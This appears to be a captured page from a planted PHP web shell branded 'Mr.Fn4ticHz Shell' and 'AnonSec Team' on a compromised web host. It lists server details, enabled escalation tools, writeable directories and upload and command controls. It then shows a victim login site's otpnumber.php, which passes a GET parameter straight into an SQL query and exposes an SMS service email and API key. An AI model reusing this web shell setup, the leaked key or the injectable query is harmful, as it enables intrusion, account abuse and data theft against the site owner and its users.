Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 13.58.116.51
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//otpnumber.php
<?php
include("dbconnection.php");
?>

<style>
table{
    border-collapse: collapse;
  width: 100%;
}

td,th {
  border: 1px solid #ddd;
  padding: 8px;
}

tr:nth-child(even){background-color: #f2f2f2;}

tr:hover {background-color: #ddd;}

th {
  padding-top: 12px;
  padding-bottom: 12px;
  text-align: left;
  background-color: #1e73be;
  color: white;
}
</style>
                <table>
                      <tr>
    
          <th><strong>Name </strong></th>
          <th><strong>Usertype</strong></th>
                   <th><strong>Type of Login</strong></th>
        </tr>
      
		    
		                <?php
		                $username = "ventexint@gmail.com";
    $apikey = "eebcced9-0ca1-4a6f-940b-c616276e2ec9";
    $sendername = "EASNUP";
$sql ="SELECT * FROM site_users WHERE numbers='$_GET[numbers]'";
		$qsql = mysqli_query($con,$sql);
		while($rd = mysqli_fetch_array($qsql))
	{
	    echo"
	    <tr>
	    <td>$rd[name]</td>
	     <td>$rd[usertype]</td>
	         <td><a href='otptest.php?userkey=$rd[userkey]'>Select</a></td>
	    </tr>

	";
	    
	}


	    

	?>
		      </form>
        </table>
</html>

Anon7 - 2022
AnonSec Team